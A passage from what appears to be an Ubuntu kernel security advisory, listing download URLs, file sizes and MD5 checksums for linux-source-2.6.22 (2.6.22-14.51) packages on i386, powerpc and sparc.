http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    33340 884040a8eb52bcd12d3cd90202508900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    33870 9fab2eeab9f3abbb4451a4e597782b55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    37986 d99b60bc1e356a463aa85b8e29b014fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    38242 103e1c39a1d9d0512e451e81523b9eb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    83238 0b564c825e660290bf3399f2a08cb7b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    83410 c352c0cd1a39b9516b700c33cc62d472\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    48218 7e15904d74558d0a580fc3e0147f11d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    48180 6887d5f9fc80aba02f3eb0598d1bfdd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:     8186 33e68145da8d6b495cdc45134a7c8f58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:     8410 628bb622936ece39fae9f156808915b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    50454 743bc54b313e1b9f11c236fdf4f08dfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    52360 2afcce9fc06e1f6d92dc83d6495abd8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    79482 a301a095385ae1adc4bef2cf52ae19cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    79794 ab505ae5ef06b6ef55d1a402b4580268\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1388120 84815adbc1581f038fc80afb3f6299a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:  1367456 e640ac4ab2a3631262aca2b4094a565c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    43016 2654a1da57ad4ee06a0f4533ec2e279f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    42486 e8a8eb59bcb7b75c96d804a0d48d0335\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    11274 512d671ea5ce4d9b099fcd1d10f5e711\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    11858 fa266d9b1992c157b65a74010705e880\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   435684 d6e803cc1c9af11ba40cfa197744aba5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:   438852 41aba777db0acbd12cf64da52c2932e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    65900 7e0f884ecdfaf6ed730d012ca1a22291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb\n      Size/MD5:    66822 763193e5e92b708d222b5074a8efbc23\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-rt_2.6.22-14.51_i386.deb\n      Size/MD5: 18591328 d86d23384ad21ff65be38468f80aeaef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-ume_2.6.22-14.51_i386.deb\n      Size/MD5:  8649096 bdde7d6406783d020da0277e72d265d6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-xen_2.6.22-14.51_i386.deb\n      Size/MD5: 17334532 47213a910137f2340005350f97648ea7\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   315144 8cf713e26667fe3ff0b4605a96f9bd30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   331820 69ffa3ef75ba51882af72a34943bf6cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   310632 1bfdab7f4ea1f597ab7e756ec6aaf137\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    69106 4e060069881dacc50801662f99b29c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    59598 936ef6e032fe2115e49ce0a88f3096ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    69114 2b8299bebccf0abae19fc058b5df511b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    47614 bfa2470b0be94ddb09e62ec630b9bfdf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    41288 b41aca463d81e2300e346df4c5cc4cd1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    47628 d08df9590ef3788d184289a6632bca63\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   107314 b7c057b70aaa7b94d254650ff52c2bc9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    91166 cfe80b9b270aaa9af06d2c406e4db2dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   107278 ad9db01dee28bd56deda9ea44def212a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    40962 835db27c5e0658d638d4695fe8fdeb7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    44728 418647b29e31d5fdfcf40f4e99768ef4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    40978 faa13def56803bfd5da5bb3ba9b65fc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   773458 695805480463d01db0b5410c23a4b735\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   709222 05912a85bbbe4739356b7ba9a69f505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   773366 e4396a0a76de96a5710415e46a3e2550\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   243300 73c16dadcb78f70194880943219faa90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   236366 2ff2b94fea409b17e090971c06e7a99d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   243258 2d99dcb8d58339b3ef10a0d6e401f0c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    53762 2cda7a39545d0a3dfdf2aec735e2b0b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    47378 77ad726e6f68c4cc34478900e792d6f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    53740 18149f314f91fc49aea088a1c98c3331\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    69038 9394dfb7f941941d18057b97ed843cda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    62394 a8f9ba27161c04f659dc4f13aeafb61b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    68972 09c313cc1035038c8a63fd82fdffbff4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   166814 b63767933833637d66d5f2c0fd102a75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   147476 957b0dae4ed134633530e5e31a161682\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   166688 e49bfcf1de63fbe0931f63fd1f5dfd0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   347896 1466204b2395d10fe4a15382788ea21b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   385004 677c6969d21e946d834709f39efe3766\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   347790 a0f546d60939ffbf2481b86756662723\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  3204080 9f894434b4c0ec2727354479a4832e69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  2182252 85e8a43b037dd81d30470c549970c946\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  3120804 a116d297928f1f9fc6d414e85f4d494f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-cell_2.6.22-14.51_powerpc.deb\n      Size/MD5:   658278 db54b942af04eb0c43a521e6df67e685\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb\n      Size/MD5:   567080 b712399ae49807be6b86c11977f4c435\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb\n      Size/MD5:   571742 5dca014dc429cde88290aee0fa6f9466\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb\n      Size/MD5:   566790 46f601e71b40dbee4b20844982160642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-cell_2.6.22-14.51_powerpc.deb\n      Size/MD5: 19764838 a6c5c34b2d448719fbe7465d5db5aa0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc-smp_2.6.22-14.51_powerpc.deb\n      Size/MD5: 18708782 e9719b9339d69fadcf3bf5022d4a2e95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc64-smp_2.6.22-14.51_powerpc.deb\n      Size/MD5: 19743012 15c44ee1d0df2a3a77104dd5ac878b2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc_2.6.22-14.51_powerpc.deb\n      Size/MD5: 18483398 a42260daefab364bb17170ab530d4f3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_powerpc.deb\n      Size/MD5:   629122 523711ed75266796795fed665de37a9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   298636 3eeeaa21b5adc86ac2c9e1cd45fb1b0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   256436 f8f345041049311ddf1410da74cdb40c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   298540 0491df9de452fc1175a8d7e8dc0c6fef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   173312 074bfedb47a5f28b1a3f3469433a9113\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   159598 7e5e5213920503815666460a5f31e456\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   173266 225154854c11fde96fcf69cbad5aa383\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   288550 0b4f4f9c42e90eae5447bf6bbacaea64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   256366 33f669c1a356a8551e9934b71ef4c56c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   288484 2104568d5fba36a95c7e64f38866e63c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1931632 53ff6c998913a0a04510d6b6e7708694\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1654746 6ef0176c868ab202269c364ea7d9bf9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1909798 b0e590a2e8501a4c479f0b40b23d2200\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   216058 874ff3bd336c5efee7df9aad59b14c9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   234428 23b4066629a576b8d67a6c1993d726b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   224102 684574c3567381ab1ef4d92d329fbdaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   181638 7a90c86bb89a87fe957d964a576006ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   153854 fd439ba89e3716a4f8f4a9c8014d2345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   181568 b9ee9056cf15a549a1bc44eeeb2ee0dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   103618 a8ff35b79df674ee7938ea9be92d6d8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    86732 4687704bf65014f8651a7c602227c567\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   103486 70e6f3bb35e15d13496960774b292b89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    46968 05c98002c23ca01e4cbaec75120c0386\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    45402 3d1c1d0d6daa2d1c342f3e9c41d3512a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    46990 773bf46f2de692c06a95379becb32efe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    54466 4675526f52be9e1a6977f6ed2ac4b45a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    41566 f9841c40936c89373d8bf06a115605a6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    47800 cf9c25932005676016484ab1fb8e23ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    87028 cb0314c3b2b71f2052b2c340ea1fd5d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    74044 65d10ff25d7b0aa1f436504b84237e4d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    87000 401f6db031db7e82765812813d2f19eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    30294 8c1d9387ecd25871638d1f1fdf4299ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    76262 9c321effb70e67c0ca38111c0439b23e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    30320 cac5ab46451e109e4aa8f0b2fcdd3edb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:     9944 cfb6f2dec7da13af5ac94bb90a7b07e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:     8456 6a8b453c691e0d5a83e7405f72512635\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:     9946 3f6bc2f6cb3bdfefa798d0b0ef8973ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    68470 bcdc3d8d53f6cea1eb0eaa9d64a3007f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    56868 dc2cdc8c4ec09bee63614de403167d05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    68450 cd1d3cd23bf3234be5607c6a79a10a30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   131420 e67fb172159455d82c04f0a86e607f35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    87802 3c118e73f1456e8267026c1a82104cae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   131242 1f1aaed227c6f475f312333a99251435\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1432142 aa733ab34026296af001d282b83ed756\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1441252 f474ebdbf144a7dd86ca2de964bbe003\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:  1432056 3aaab714864bf27fb4c152ac8fa6209d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    70942 d26e171c9b6b3a80b442fb4f5525a1ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    75506 b3bfa244684cbebc8830b72a77e7f4ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    84750 77311918b0eaf6d58922eb04ed0a95cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    14528 428222023bf05f4f448c88960f8b9f0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    12526 23e4a0793d3287323f94e23621a5d34f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    14528 004dee3afbe741bc92e07d1e13fe46bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   558358 c187edbade80249854e6f826a3896033\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   492718 58c3eae42399c3bd2e76d26c5f546fc4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   549324 dcdbf765e239b792c41b27c82b603153\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   105356 41e99bfc7b583339323fb76beb86a635\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:    79660 b4ba9625685b845ad14cf3d07178544e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb\n      Size/MD5:   104298 dc9e68d7635ecd9289b56179763cf19d\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    59314 48e9a8ed9f2b56a8b8cb51a273a06ede\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb\n      Size/MD5:    68264 a2d332c0643bf6b1a4e53cae6f3bfe9e\n    